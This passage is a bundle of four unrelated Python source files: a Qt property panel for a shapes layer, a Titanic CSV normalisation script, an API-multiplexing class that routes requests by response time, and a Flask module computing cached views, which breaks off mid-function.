class QtMoveFrontButton(QPushButton):
    """Push button that brings the selected shapes to the front."""

    def __init__(self, layer):
        super().__init__()
        self.layer = layer
        # Square 28x28 button to match the mode buttons.
        self.setFixedWidth(28)
        self.setFixedHeight(28)
        self.clicked.connect(self.layer.move_to_front)
        self.setToolTip('Move to front')
class QtShapesProperties(QtLayerProperties):
    """Property sheet for a shapes layer.

    Adds an edge-width slider plus face/edge color dropdowns to the grid
    layout, and keeps each widget in sync with the corresponding layer
    event (edge_width, edge_color, face_color).
    """
    def __init__(self, layer):
        super().__init__(layer)
        # Mirror layer-side changes back into the widgets.
        self.layer.events.edge_width.connect(self._on_edge_width_change)
        self.layer.events.edge_color.connect(self._on_edge_color_change)
        self.layer.events.face_color.connect(self._on_face_color_change)
        # Edge width slider: integer positions 0..40 map to widths 0..20
        # (see changeWidth, which halves the slider value).
        sld = QSlider(Qt.Horizontal, self)
        sld.setFocusPolicy(Qt.NoFocus)
        sld.setFixedWidth(75)
        sld.setMinimum(0)
        sld.setMaximum(40)
        sld.setSingleStep(1)
        value = self.layer.edge_width
        # Per-shape widths come through as an iterable; show their mean.
        # NOTE(review): `Iterable` is imported from `collections` at the top
        # of this file, which is removed in Python 3.10 — should come from
        # `collections.abc`.
        if isinstance(value, Iterable):
            if isinstance(value, list):
                value = np.asarray(value)
            value = value.mean()
        sld.setValue(int(value))
        sld.valueChanged[int].connect(
            lambda value=sld: self.changeWidth(value)
        )
        self.widthSlider = sld
        row = self.grid_layout.rowCount()
        self.grid_layout.addWidget(QLabel('width:'), row, self.name_column)
        self.grid_layout.addWidget(sld, row, self.property_column)
        # Face color dropdown, populated from the layer's palette and
        # preselected to the current face color.
        face_comboBox = QComboBox()
        colors = self.layer._colors
        for c in colors:
            face_comboBox.addItem(c)
        index = face_comboBox.findText(
            self.layer.face_color, Qt.MatchFixedString
        )
        if index >= 0:
            face_comboBox.setCurrentIndex(index)
        face_comboBox.activated[str].connect(
            lambda text=face_comboBox: self.changeFaceColor(text)
        )
        self.faceComboBox = face_comboBox
        row = self.grid_layout.rowCount()
        self.grid_layout.addWidget(
            QLabel('face_color:'), row, self.name_column
        )
        self.grid_layout.addWidget(face_comboBox, row, self.property_column)
        # Edge color dropdown, built the same way as the face color one.
        edge_comboBox = QComboBox()
        colors = self.layer._colors
        for c in colors:
            edge_comboBox.addItem(c)
        index = edge_comboBox.findText(
            self.layer.edge_color, Qt.MatchFixedString
        )
        if index >= 0:
            edge_comboBox.setCurrentIndex(index)
        edge_comboBox.activated[str].connect(
            lambda text=edge_comboBox: self.changeEdgeColor(text)
        )
        self.edgeComboBox = edge_comboBox
        row = self.grid_layout.rowCount()
        self.grid_layout.addWidget(
            QLabel('edge_color:'), row, self.name_column
        )
        self.grid_layout.addWidget(edge_comboBox, row, self.property_column)
        self.setExpanded(False)
    def changeFaceColor(self, text):
        """Push the chosen face color name to the layer."""
        self.layer.face_color = text
    def changeEdgeColor(self, text):
        """Push the chosen edge color name to the layer."""
        self.layer.edge_color = text
    def changeWidth(self, value):
        # Slider positions are doubled widths, so halve on the way out.
        self.layer.edge_width = float(value) / 2
    def _on_edge_width_change(self, event):
        # Block re-entry while reflecting the layer value onto the slider.
        with self.layer.events.edge_width.blocker():
            value = self.layer.edge_width
            value = np.clip(int(2 * value), 0, 40)
            self.widthSlider.setValue(value)
    def _on_edge_color_change(self, event):
        with self.layer.events.edge_color.blocker():
            index = self.edgeComboBox.findText(
                self.layer.edge_color, Qt.MatchFixedString
            )
            self.edgeComboBox.setCurrentIndex(index)
    def _on_face_color_change(self, event):
        with self.layer.events.face_color.blocker():
            index = self.faceComboBox.findText(
                self.layer.face_color, Qt.MatchFixedString
            )
            self.faceComboBox.setCurrentIndex(index)
|
import csv
import numpy as np
import matplotlib.pyplot as plt
from sklearn import linear_model, datasets
# Location of the training data CSV on disk.
folder = "trained_data/"
filename = "train.csv"
# Categorical-to-numeric encoding for the 'Sex' column.
gender_to_number = {
    'male' : 0,
    'female': 1
}
# Encoding for the 'Embarked' port code; '' (missing) folds into 'S' (0).
port_to_number = {
    '' : 0,
    'S': 0,
    'C': 1,
    'Q': 2
}
# Columns dropped from every row before training.
keys_to_remove = [
    'Name',
    'Fare',
    'Ticket',
    'PassengerId'
]
def normalize_data():
    """Read the training CSV and coerce every remaining column to a number.

    Drops the columns in keys_to_remove, maps the categorical Sex and
    Embarked columns through their lookup tables, fills blank numeric
    fields with defaults, and collapses Cabin to a presence flag.
    Returns the list of normalized row dicts.
    """
    normalized_rows = []
    # NOTE(review): this file uses Python 2 idioms ('rb' mode for csv);
    # under Python 3 the csv module expects text mode with newline=''.
    with open(folder + filename, 'rb') as csvfile:
        reader = csv.DictReader(csvfile)
        for record in reader:
            for dropped_key in keys_to_remove:
                del record[dropped_key]
            record['Sex'] = gender_to_number[record['Sex']]
            record['Embarked'] = port_to_number[record['Embarked']]
            record['Age'] = float(record['Age']) if record['Age'] != "" else 0
            record['Parch'] = int(record['Parch']) if record['Parch'] != "" else 0
            record['Pclass'] = int(record['Pclass']) if record['Pclass'] != "" else 3
            record['Survived'] = int(record['Survived'])
            record['SibSp'] = int(record['SibSp']) if record['SibSp'] != "" else 0
            record['Cabin'] = 1 if record['Cabin'] != "" else 0
            normalized_rows.append(record)
    return normalized_rows
def remove_data_keys(data):
    """Flatten a list of dicts into a list of value lists.

    Values appear in each dict's key-iteration order; the keys themselves
    are discarded.
    """
    return [[record[key] for key in record] for record in data]
# ---- script entry: load and flatten the training data --------------------
# NOTE(review): the bare `print` statements below are Python 2 syntax; this
# script will not run under Python 3 as written.
data = normalize_data()
matrix = remove_data_keys(data)
####################################################
# Iris is loaded only for exploratory printing below; the actual Titanic
# features come from `matrix`.
iris = datasets.load_iris()
# X = iris.data[:, :2] # we only take the first two features.
# X = matrix[:, :8]
print iris.data
# print data
# print matrix
print type(data)
survived = [] # Y: List of 1's 0's
# NOTE(review): assumes column index 5 of each flattened row is 'Survived';
# this depends on dict key ordering in remove_data_keys — verify before use.
for row in matrix:
    survived.append(row[5])
Y = survived
# # # import some data to play with
# # iris = datasets.load_iris()
# # X = iris.data[:, :2] # we only take the first two features.
# # X = matrix
# # # Y = iris.target
#
# h = .02 # step size in the mesh
#
# logreg = linear_model.LogisticRegression(C=1e5)
#
# # we create an instance of Neighbours Classifier and fit the data.
# logreg.fit(X, Y)
#
# # Plot the decision boundary. For that, we will assign a color to each
# # point in the mesh [x_min, m_max]x[y_min, y_max].
# x_min, x_max = X[:, 0].min() - .5, X[:, 0].max() + .5
# y_min, y_max = X[:, 1].min() - .5, X[:, 1].max() + .5
# xx, yy = np.meshgrid(np.arange(x_min, x_max, h), np.arange(y_min, y_max, h))
# Z = logreg.predict(np.c_[xx.ravel(), yy.ravel()])
#
# # Put the result into a color plot
# Z = Z.reshape(xx.shape)
# plt.figure(1, figsize=(4, 3))
# plt.pcolormesh(xx, yy, Z, cmap=plt.cm.Paired)
#
# # Plot also the training points
# plt.scatter(X[:, 0], X[:, 1], c=Y, edgecolors='k', cmap=plt.cm.Paired)
# plt.xlabel('Sepal length')
# plt.ylabel('Sepal width')
#
# plt.xlim(xx.min(), xx.max())
# plt.ylim(yy.min(), yy.max())
# plt.xticks(())
# plt.yticks(())
#
# plt.show()
|
from concurrent.futures import ThreadPoolExecutor
import numpy
import operator
import random
import sys
from threading import Thread, Lock
import time
from timeit import default_timer as timer
import traceback
from apimux.log import logger
from apimux.rwlock import ReadWriteLock
from apimux import config
class APIMultiplexer(object):
    """Multiplexes requests across several third-party APIs.

    Tracks a response-time percentile per API and routes each request to
    the fastest APIs first, optionally with round-robin rotation or a
    probabilistic exploration of slower APIs.
    """

    def __init__(self, api_list=None, config_filepath='config.ini'):
        """
        Parameters
        ----------
        api_list : list, optional
            List of objects that are implementing the default class
            BaseThirdPartyAPIService.
        config_filepath : str
            Path to the INI file parsed by apimux.config.
        """
        apimux_cfg = config.parse_config(config_filepath)
        self.PERCENTILE = apimux_cfg.getint("PERCENTILE")
        self.MAX_HISTORY_RTIME = apimux_cfg.getint("MAX_HISTORY_RTIME")
        self.MAX_WAIT_TIME = apimux_cfg.getint("MAX_WAIT_TIME")
        self._PERIODIC_CHECK_INTERVAL = apimux_cfg.getint("PERIODIC_CHECK")
        logger.debug("Initializing the APIMultiplexer class")
        # Locks used to prevent multi-threading issues
        self._locks = {}
        # ReadWriteLock allows multiple readers and only one writer
        self._locks["_api_list"] = ReadWriteLock()
        self._api_list = {}
        self._locks["_api_response_times"] = Lock()
        self._api_response_times = {}
        self._locks["_percentile_map"] = Lock()
        self._percentile_map = {}
        self._futures_not_finished = {}
        self._locks["_futures_not_finished"] = Lock()
        # Registering all APIs passed as parameters.
        # BUGFIX: the default used to be a mutable `[]`, shared between
        # all instances; `None` + a guard avoids that pitfall.
        for x in (api_list or []):
            self.register_new_api(x)
        self._ignore_slow_apis = apimux_cfg.getboolean("ignore_slow_apis")
        self._slow_multiplied = apimux_cfg.getfloat("slow_multiplied")
        self._exploration_coefficient = apimux_cfg.getint(
            "exploration_coefficient")
        # Whether it should enable round robin or not
        self._round_robin = apimux_cfg.getboolean("round_robin")
        if self._round_robin:
            logger.info("Round robin enabled!")
            # Disable exploration if round robin is enabled
            self._exploration_coefficient = 0
        elif self._exploration_coefficient > 0:
            logger.info("Exploration with percentage %s enabled!"
                        % self._exploration_coefficient)
        self._current_order = []
        self._locks["_current_order"] = Lock()
        if apimux_cfg.getboolean("enable_periodic_check"):
            # Starting a background thread which will run periodically
            # the 'check' method if implemented by the user for an API
            self._periodic_check_thread = Thread(
                target=self._periodic_check, args=())
            # `daemon = True` replaces the deprecated setDaemon() call.
            self._periodic_check_thread.daemon = True
            self._periodic_check_thread.start()

    @property
    def _round_robin_list(self):
        # Lazily snapshot the registered API names the first time the
        # round-robin order is needed.
        if self._current_order:
            return self._current_order
        with self._locks["_current_order"]:
            with self._locks["_api_list"]:
                self._current_order = [x for x in self._api_list]
        return self._current_order

    def _time_function(self, f, data):
        """
        Helper to measure the response time of function f.

        Parameters
        ----------
        f : function
            The function for which the response time will be measured.
        data : object
            The object which will be passed to the call to function f.

        Returns
        -------
        tuple
            (result of f, elapsed time in milliseconds).
        """
        start = timer()
        result = f(data)
        end = timer()
        # default_timer() returns seconds; convert to milliseconds.
        elapsed_ms = (end - start) * 1000
        return (result, elapsed_ms)

    def _get_result(self, api, data):
        """
        Gets the result from an API.

        Notes
        -----
        Returns None if the api raises an exception.

        Parameters
        ----------
        api : BaseThirdPartyAPIService
            The API object which implements the class BaseThirdPartyAPIService.
        data : object
            The object which will be sent to the method get_result of the
            api parameter.

        Returns
        -------
        object
            The result of calling get_result of the api object.
        """
        try:
            result, response_time = self._time_function(api.get_result, data)
            self._process_response_time_api(response_time, api)
            return result
        except Exception:
            # format_exc() captures the current exception; no need for
            # the manual sys.exc_info() dance.
            logger.warning("API raised the exception: %s"
                           % traceback.format_exc())
            return None

    def _shift_current_order_and_get_first(self):
        """
        Updates the current order of API list used for round robin.

        Returns
        -------
        BaseThirdPartyAPIService
            The first API after the list is shifted to the left by one.
        """
        logger.debug("Current round robin order: %s" % self._round_robin_list)
        first_apiname = self._round_robin_list.pop(0)
        self._round_robin_list.append(first_apiname)
        logger.debug("New round robin order: %s" % self._round_robin_list)
        with self._locks["_api_list"]:
            first_api = self._api_list.get(first_apiname)
        return first_api

    def _should_explore(self):
        """
        Decide whether this request should explore via round-robin
        instead of always picking the fastest API.

        Notes
        -----
        Effectively disabled when the exploration coefficient is <= 0.

        Returns
        -------
        bool
            True with self._exploration_coefficient percent chance.
        """
        return random.randint(1, 100) <= self._exploration_coefficient

    def _get_fastest_api(self, sp_list=None):
        """
        Returns the fastest API so far.

        The result is based on sp_list. If sp_list is empty/None, the
        current order of APIs sorted by response-time percentile is
        fetched and returned as context for subsequent calls.

        Notes
        -----
        Round robin mode doesn't require the sp_list parameter.

        Parameters
        ----------
        sp_list : list, optional
            Previous list of (api_name, percentile) pairs sorted by the
            percentile response time; None/empty on the first call.

        Returns
        -------
        tuple
            (API object, context list to pass to the next call).
        """
        # BUGFIX: mutable default `[]` replaced with None + guard.
        sp_list = sp_list or []

        def get_exploratory_api_and_context():
            logger.debug("This request will try to explore with round-robin")
            new_api = self._shift_current_order_and_get_first()
            logger.debug("Picking API %s" % new_api.name)
            # Remove the API that was picked from the list of remaining APIs
            new_sp_list = [x for x in sp_list if x[0] != new_api.name]
            return new_api, new_sp_list

        if self._round_robin:
            return self._shift_current_order_and_get_first(), None
        should_explore = self._should_explore()
        if sp_list:
            if should_explore:
                return get_exploratory_api_and_context()
            with self._locks["_api_list"]:
                return self._api_list.get(sp_list.pop(0)[0]), sp_list
        with self._locks["_percentile_map"]:
            sp_list = sorted(self._percentile_map.items(),
                             key=operator.itemgetter(1))
        if should_explore:
            return get_exploratory_api_and_context()
        logger.debug("Sorted by response time median: %s" % sp_list)
        with self._locks["_api_list"]:
            fastest_api = self._api_list.get(sp_list.pop(0)[0])
        return fastest_api, sp_list

    def _prepare_get_next_results(self, number_of_results, exclude_services):
        # Clamp the requested count to what is actually available once
        # the excluded services are removed; -1 means "all".
        max_number_of_results = len(self._api_list) - len(exclude_services)
        if number_of_results == -1:
            requested_results = max_number_of_results
        else:
            requested_results = min(number_of_results, max_number_of_results)
        allowed_failed_futures = max_number_of_results - requested_results
        # ThreadPoolExecutor raises ValueError for max_workers <= 0, so
        # guard the degenerate "nothing requested" case.
        executor = ThreadPoolExecutor(max_workers=max(1, requested_results))
        return allowed_failed_futures, requested_results, executor

    def get_next_results(self, data, number_of_results,
                         exclude_services=None, exclude_results=None):
        """
        Retrieve the next N results from the registered APIs.

        This function retrieves the next "number_of_results" using the
        list which contains the fastest APIs by average response time.

        Notes
        -----
        If self.MAX_WAIT_TIME is greater than 0, this method will try
        to return within the specified time as long as there is at least
        one result to return. If the running time passes the specified
        time it will still wait for at least one result from the APIs.
        If self.MAX_WAIT_TIME is 0, this method will wait as long as it's
        needed to fetch the required number of results.

        Parameters
        ----------
        data : dict
            Contains specific implementation of the objects that implement
            BaseThirdPartyAPIService class.
        number_of_results : int
            Number of results that will be fetched. Pass -1 to retrieve
            results from all registered APIs; a number larger than the
            number of registered APIs behaves like -1.
        exclude_services : list of strings, optional
            Service names which should be excluded from processing.
        exclude_results : list, optional
            NOTE(review): accepted for backward compatibility but never
            used by the current implementation — confirm intent.

        Returns
        -------
        list of tuples
            (api name, result from that API's get_result).
        """
        # BUGFIX: mutable default arguments replaced with None + guards.
        exclude_services = exclude_services or []
        results = []
        sp_list = []
        future_to_api = {}
        failed_futures = 0
        failed_futures_lock = Lock()
        allowed_failed_futures, requested_results, executor = (
            self._prepare_get_next_results(number_of_results,
                                           exclude_services))

        def register_result(future):
            # Appends the result from the future to the final list that
            # will be returned. The future is ignored if it was cancelled.
            if not future.cancelled():
                nonlocal failed_futures
                nonlocal results
                future_exception = future.exception()
                if future_exception:
                    with failed_futures_lock:
                        failed_futures += 1
                    logger.warning("API %s raised exception %s" % (
                        future_to_api[future]['name'], future_exception))
                elif future.result() is not None:
                    results.append((future_to_api[future]['name'],
                                    future.result()))
                else:
                    # The API returned an invalid result, mark the future
                    # as failed and continue fetching from the next one.
                    with failed_futures_lock:
                        failed_futures += 1
            # Remove the future from the map
            future_to_api.pop(future, None)

        def launch_future(api, data, executor):
            future = executor.submit(self._get_result, api, data)
            future_to_api[future] = {"name": api.name,
                                     "start_time_ms": timer()}
            future.add_done_callback(register_result)

        def replace_failed_future(sp_list, data, exclude_services, executor,
                                  elapsed_ms=None):
            """
            Helper that replaces failed futures with new ones.

            Launches a request against the next-fastest API whenever a
            previous request failed, so the requested number of results
            can still be met.

            Notes
            -----
            elapsed_ms is only meaningful when self.MAX_WAIT_TIME > 0.
            """
            nonlocal failed_futures
            nonlocal allowed_failed_futures
            with failed_futures_lock:
                if (allowed_failed_futures > 0 and
                        failed_futures > 0 and sp_list):
                    api, sp_list = self._get_fastest_api(sp_list=sp_list)
                    if api.name in exclude_services:
                        return
                    max_timeout = self._get_max_api_timeout(api.name)
                    if elapsed_ms is not None:
                        if not (elapsed_ms + max_timeout) < self.MAX_WAIT_TIME:
                            # Too late to launch new futures.
                            # BUGFIX: previously the future was launched
                            # anyway and the counter decremented to -1,
                            # which defeated the caller's `== 0` exit test.
                            allowed_failed_futures = 0
                            return
                    launch_future(api, data, executor)
                    failed_futures -= 1
                    allowed_failed_futures -= 1

        def cancel_slow_apis():
            # Cancels the requests currently in progress if the elapsed time
            # so far is greater than the response time of self.PERCENTILE
            # percentage of requests multiplied by self._slow_multiplied.
            nonlocal failed_futures
            # Snapshot the keys: register_result() pops entries from
            # future_to_api concurrently with this loop.
            for future in list(future_to_api):
                api_details = future_to_api.get(future)
                if api_details is None:
                    continue
                # BUGFIX: elapsed time was computed as start - now (always
                # negative, in seconds); convert to positive milliseconds
                # so it is comparable with the percentile timeouts.
                elapsed_ms = (timer() - api_details['start_time_ms']) * 1000
                if elapsed_ms > self._get_max_api_timeout(api_details['name']):
                    with failed_futures_lock:
                        failed_futures += 1
                    future.cancel()

        try:
            current_requests_sent = 0
            while True:
                api, sp_list = self._get_fastest_api(sp_list=sp_list)
                if api.name in exclude_services:
                    continue
                logger.debug("Launching future: %s" % api)
                launch_future(api, data, executor)
                current_requests_sent += 1
                if current_requests_sent == requested_results:
                    break
            if self.MAX_WAIT_TIME > 0:
                start_time = timer()
                while len(results) < requested_results:
                    elapsed_ms = (timer() - start_time) * 1000
                    if (elapsed_ms > self.MAX_WAIT_TIME and
                            len(results) > 0) or allowed_failed_futures == 0:
                        break
                    # Launch a new future if we have any failed futures.
                    replace_failed_future(
                        sp_list, data, exclude_services, executor, elapsed_ms)
                    # Cancel slow APIs
                    cancel_slow_apis()
                    time.sleep(0.01)
                # Maximum wait time has passed here, cancel all futures and
                # return as soon as possible (snapshot keys — callbacks
                # mutate the map).
                for future in list(future_to_api):
                    future.cancel()
            else:
                while len(results) < requested_results:
                    # Launch a new future if we have any failed futures.
                    replace_failed_future(
                        sp_list, data, exclude_services, executor)
                    if len(sp_list) == 0:
                        break
                    time.sleep(0.01)
        finally:
            # When self.MAX_WAIT_TIME > 0 all futures will be already done
            # executing or cancelled here which allows the executor to free
            # the resources immediately.
            # When self.MAX_WAIT_TIME == 0 the executor will wait as long as
            # it's required for the futures to respond.
            executor.shutdown(wait=True)
        return results

    def _get_max_api_timeout(self, apiname):
        """
        Returns the maximum expected response time for an API.

        Computed as the user-defined percentile of observed response
        times multiplied by the configurable `slow_multiplied` delta.

        Parameters
        ----------
        apiname : string
            The name of the API.

        Returns
        -------
        float
            The maximum expected response time in milliseconds.
        """
        with self._locks["_percentile_map"]:
            # BUGFIX: default to 0 instead of None — the old code crashed
            # on `None * self._slow_multiplied` for unknown API names.
            timeout_result = self._percentile_map.get(apiname, 0)
        return timeout_result * self._slow_multiplied

    def register_new_api(self, api):
        """
        Registers new API and adds it to the internal list.

        Parameters
        ----------
        api : object
            The object implementing BaseThirdPartyAPIService class.

        Raises
        ------
        Exception
            If an API with the same name is already registered.
        """
        logger.info("New API to register: %s" % api.name)
        self._locks["_api_list"].acquire_write()
        try:
            if self._api_list.get(api.name, None) is not None:
                raise Exception("API already exists in the list")
            self._api_list[api.name] = api
        finally:
            # BUGFIX: release in a finally block — the old code leaked the
            # write lock permanently when the duplicate-name check raised.
            self._locks["_api_list"].release_write()
        # All APIs start from 0 initially, this will be automatically
        # reconfigured based on the performance of the APIs.
        with self._locks["_api_response_times"]:
            self._api_response_times[api.name] = []
        with self._locks["_percentile_map"]:
            self._percentile_map[api.name] = 0
        logger.info("New list: %s" % self._api_list.keys())

    def remove_api(self, api):
        """
        Removes the API from the internal list.

        Parameters
        ----------
        api : object
            The object implementing BaseThirdPartyAPIService class.
        """
        logger.info("Removing API: %s" % api.name)
        self._locks["_api_list"].acquire_write()
        try:
            removed_api = self._api_list.pop(api.name, None)
        finally:
            self._locks["_api_list"].release_write()
        if removed_api is None:
            logger.debug("Tried to remove API which is "
                         "not present in the list")
            return
        logger.debug("Removed API")
        # Drop the bookkeeping entries for the removed API.
        with self._locks["_api_response_times"]:
            self._api_response_times.pop(api.name, None)
        with self._locks["_percentile_map"]:
            self._percentile_map.pop(api.name, None)
        logger.info("New list: %s" % self._api_list.keys())

    def _process_response_time_api(self, response_time, api):
        """
        Analyses the response time of an API.

        Called on every response to update the rolling history and the
        percentile used for routing decisions.

        Parameters
        ----------
        response_time : float
            Elapsed time in milliseconds.
        api : object
            The API which had the response time passed above.
        """
        logger.info("%s: response time %sms" % (api.name, response_time))
        with self._locks["_api_response_times"]:
            if (len(self._api_response_times[api.name]) >
                    self.MAX_HISTORY_RTIME):
                # Remove from the history once it reaches max limit
                self._api_response_times[api.name].pop(0)
            self._api_response_times[api.name] += [response_time]
            # Sorted returns a new cloned list
            np_array = numpy.array(sorted(self._api_response_times[api.name]))
        # Compute the response time of self.PERCENTILE percentage of requests
        p = numpy.percentile(np_array, self.PERCENTILE)
        with self._locks["_percentile_map"]:
            self._percentile_map[api.name] = p
        logger.debug("%s - %s percentile result: %s"
                     % (api.name, self.PERCENTILE, p))

    def _periodic_check(self):
        """
        Periodic check for the health and performance of the APIs.

        Runs in a daemon thread and feeds the response time of each
        API's optional `check()` method into the percentile bookkeeping,
        keeping routing data fresh even under low traffic.
        """
        while True:
            logger.debug("Starting periodic priority check")
            with self._locks["_api_list"]:
                logger.debug("API list: %s" % self._api_list.keys())
                for key in self._api_list:
                    api = self._api_list.get(key)
                    logger.debug("Performing priority check on API: %s"
                                 % api.name)
                    try:
                        response_time = api.check()
                        self._process_response_time_api(response_time, api)
                    except NotImplementedError:
                        # Ignore NotImplementedError, the user has decided
                        # to not implement the periodic check for the
                        # response time of this API
                        logger.debug("API %s has no priority check method "
                                     "implemented." % api.name)
            logger.debug("End of periodic priority check")
            time.sleep(self._PERIODIC_CHECK_INTERVAL)
|
<filename>skbl/computeviews.py
"""Define helper functions used to compute the different views."""
import json
import os.path
import smtplib
import urllib.parse
from collections import defaultdict
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from hashlib import md5
from urllib.request import urlopen
from flask import current_app, g, render_template, request
from flask_babel import gettext
from . import helpers, static_info
def getcache(page, lang, usecache):
    """
    Get cached page.
    Check if the requested page, in language 'lang', is in the cache
    If not, use the backup cache.
    If the cache should not be used, return None
    """
    # Derive the language from the URL rule when not given explicitly.
    if not lang:
        lang = "sv" if "sv" in request.url_rule.rule else "en"
    # Bypass caching entirely when disabled or while testing.
    if not usecache or current_app.config["TEST"]:
        return None, lang
    pagename = helpers.cache_name(page, lang=lang)
    try:
        with g.mc_pool.reserve() as client:
            # Prefer the live entry; fall back to its backup copy.
            for key in (pagename, pagename + "_backup"):
                cached = client.get(key)
                if cached is not None:
                    return cached, lang
    except Exception:
        # TODO what to do??
        pass
    # Nothing found in either slot.
    return None, lang
def copytobackup(fields, lang):
    """Make backups of all requested fields to their corresponding backup field."""
    # NOTE(review): the value is read with the raw key `field + lang` but
    # written under `helpers.cache_name(field, lang) + "_backup"`. Confirm
    # that cache_name(field, lang) == field + lang; otherwise the backup
    # key never matches the live key read elsewhere.
    for field in fields:
        with g.mc_pool.reserve() as client:
            art = client.get(field + lang)
            client.set(helpers.cache_name(field, lang) + "_backup", art, time=current_app.config["CACHE_TIME"])
def searchresult(result, name="", searchfield="", imagefolder="", query="",
                 searchtype="equals", title="", authorinfo=False, lang="",
                 show_lang_switch=True, cache=True):
    """Compute the search result.

    Renders a hit list for `result` (cached when the number of hits
    reaches CACHE_HIT_LIMIT) or an error page if the query fails.
    """
    helpers.set_language_switch_link("%s_index" % name, result)
    try:
        # (removed a no-op `result = result` self-assignment)
        pagename = name + "_" + urllib.parse.quote(result)
        art = helpers.check_cache(pagename, lang)
        if art is not None:
            return art
        show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng"])
        if query:
            hits = helpers.karp_query("minientry", {"q": query, "show": show})
        else:
            hits = helpers.karp_query("minientry",
                                      {"q": "extended||and|%s.search|%s|%s" % (searchfield, searchtype, result),
                                       "show": show})
        title = title or result
        no_hits = hits["hits"]["total"]
        if no_hits > 0:
            # Attach a portrait when one exists on disk for this result.
            picture = None
            if os.path.exists(current_app.config.root_path + "/static/images/%s/%s.jpg" % (imagefolder, result)):
                picture = "/static/images/%s/%s.jpg" % (imagefolder, result)
            page = render_template("list.html", picture=picture,
                                   alphabetic=True, title=title,
                                   headline=title, hits=hits["hits"],
                                   authorinfo=authorinfo,
                                   show_lang_switch=show_lang_switch)
            # Only cache pages with many hits; small ones are cheap to
            # recompute.
            if no_hits >= current_app.config["CACHE_HIT_LIMIT"]:
                try:
                    with g.mc_pool.reserve() as client:
                        client.set(helpers.cache_name(pagename, lang), page, time=current_app.config["CACHE_TIME"])
                except Exception:
                    # TODO what to do?
                    pass
            return page
        else:
            return render_template("page.html", content=gettext("Contents could not be found!"))
    except Exception as e:
        # Surface the failing query to ease debugging.
        return render_template("page.html",
                               content="%s\n%s: extended||and|%s.search|%s|%s" % (e, current_app.config["KARP_BACKEND"], searchfield, searchtype, result))
def compute_organisation(lang="", infotext="", cache=True, url=""):
    """Compute organisation view."""
    helpers.set_language_switch_link("organisation_index", lang=lang)
    art, lang = getcache("organisation", lang, cache)
    if art is not None:
        return art
    infotext = helpers.get_infotext("organisation", request.url_rule.rule)
    # English pages use the translated organisation-type field.
    if lang == "en":
        show_fields = "organisationsnamn,organisationstyp_eng"
        typefield = "type_eng"
    else:
        show_fields = "organisationsnamn,organisationstyp"
        typefield = "type"
    data = helpers.karp_query("minientry",
                              {"q": "extended||and|anything|regexp|.*",
                               "show": show_fields})
    # Group article ids by organisation type, then by organisation name.
    nested_obj = {}
    for hit in data["hits"]["hits"]:
        for org in hit["_source"].get("organisation", []):
            orgtype = helpers.unescape(org.get(typefield, "-"))
            bucket = nested_obj.setdefault(orgtype, defaultdict(set))
            bucket[org.get("name", "-")].add(hit["_id"])
    art = render_template("nestedbucketresults.html",
                          results=nested_obj, title=gettext("Organisations"),
                          infotext=infotext, name="organisation", page_url=url)
    try:
        with g.mc_pool.reserve() as client:
            client.set(helpers.cache_name("organisation", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def compute_activity(lang="", cache=True, url=""):
    """Compute activity view."""
    helpers.set_language_switch_link("activity_index", lang=lang)
    art, lang = getcache("activity", lang, cache)
    if art is not None:
        return art
    infotext = helpers.get_infotext("activity", request.url_rule.rule)
    # Build the list of reference entries to insert into the results.
    # BUGFIX: work on copies — the previous in-place
    # `[ref.append("reference") for ref in reference_list]` mutated the
    # shared static_info list, so every cache miss appended one more
    # "reference" marker to each entry.
    reference_list = [list(ref) + ["reference"]
                      for ref in static_info.activities_reference_list]
    art = bucketcall(queryfield="verksamhetstext", name="activity",
                     title=gettext("Activities"), infotext=infotext,
                     alphabetical=True,
                     description=helpers.get_shorttext(infotext),
                     insert_entries=reference_list,
                     page_url=url)
    try:
        with g.mc_pool.reserve() as client:
            client.set(helpers.cache_name("activity", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def compute_article(lang="", cache=True, url="", map=False):
    """Compute article view (list or map rendering of all articles)."""
    helpers.set_language_switch_link("article_index", lang=lang)
    art, lang = getcache("article", lang, cache)
    if art is not None:
        return art
    show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng", "platspinlat.bucket", "platspinlon.bucket"])
    infotext = helpers.get_infotext("article", request.url_rule.rule)
    # Swedish and English use different sort-key chains.
    if lang == "sv":
        sort_order = "sorteringsnamn.sort,sorteringsnamn.init,tilltalsnamn.sort"
    else:
        sort_order = "sorteringsnamn.eng_sort,sorteringsnamn.eng_init,sorteringsnamn.sort,tilltalsnamn.sort"
    data = helpers.karp_query("minientry",
                              {"q": "extended||and|namn|exists",
                               "show": show,
                               "sort": sort_order},
                              mode=current_app.config["SKBL_LINKS"])
    if map:
        art = render_template("map.html",
                              hits=data["hits"],
                              headline=gettext("Map"),
                              infotext=infotext,
                              title="Map",
                              page_url=url)
    else:
        art = render_template("list.html",
                              hits=data["hits"],
                              headline=gettext("Women A-Z"),
                              alphabetic=True,
                              split_letters=True,
                              infotext=infotext,
                              title="Articles",
                              page_url=url)
    try:
        with g.mc_pool.reserve() as client:
            client.set(helpers.cache_name("article", lang), art, time=current_app.config["CACHE_TIME"])
    except Exception:
        # TODO what to do?
        pass
    return art
def compute_map(lang="", cache=True, url=""):
    """Compute map view."""
    helpers.set_language_switch_link("map", lang=lang)
    art, lang = getcache("map", lang, cache)
    if art is not None:
        return art
    show = ",".join(["name", "url", "undertitel", "lifespan", "undertitel_eng", "platspinlat.bucket", "platspinlon.bucket"])
    infotext = helpers.get_infotext("map", request.url_rule.rule)
    if lang == "sv":
        data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
                                                "sort": "sorteringsnamn.sort,sorteringsnamn.init,tilltalsnamn.sort"},
                                  mode=current_app.config["KARP_MODE"])
    else:
        data = helpers.karp_query("minientry", {"q": "extended||and|namn|exists", "show": show,
                                                "sort": "sorteringsnamn.eng_sort,sorteringsnamn.eng_init,sorteringsnamn.sort,tilltalsnamn.sort"},
                                  mode=current_app.config["KARP_MODE"])
    # BUGFIX: the rendering used to be guarded by `if map:`, which tested
    # the `map` BUILTIN (always truthy) — a leftover from compute_article,
    # which takes a `map` parameter. Had it ever been falsy, `art` below
    # would have been unbound. Render unconditionally.
    art = render_template("map.html",
                          hits=data["hits"],
                          headline=gettext("Map"),
                          infotext=infotext,
                          title="Map",
                          page_url=url)
    try:
        with g.mc_pool.reserve() as client:
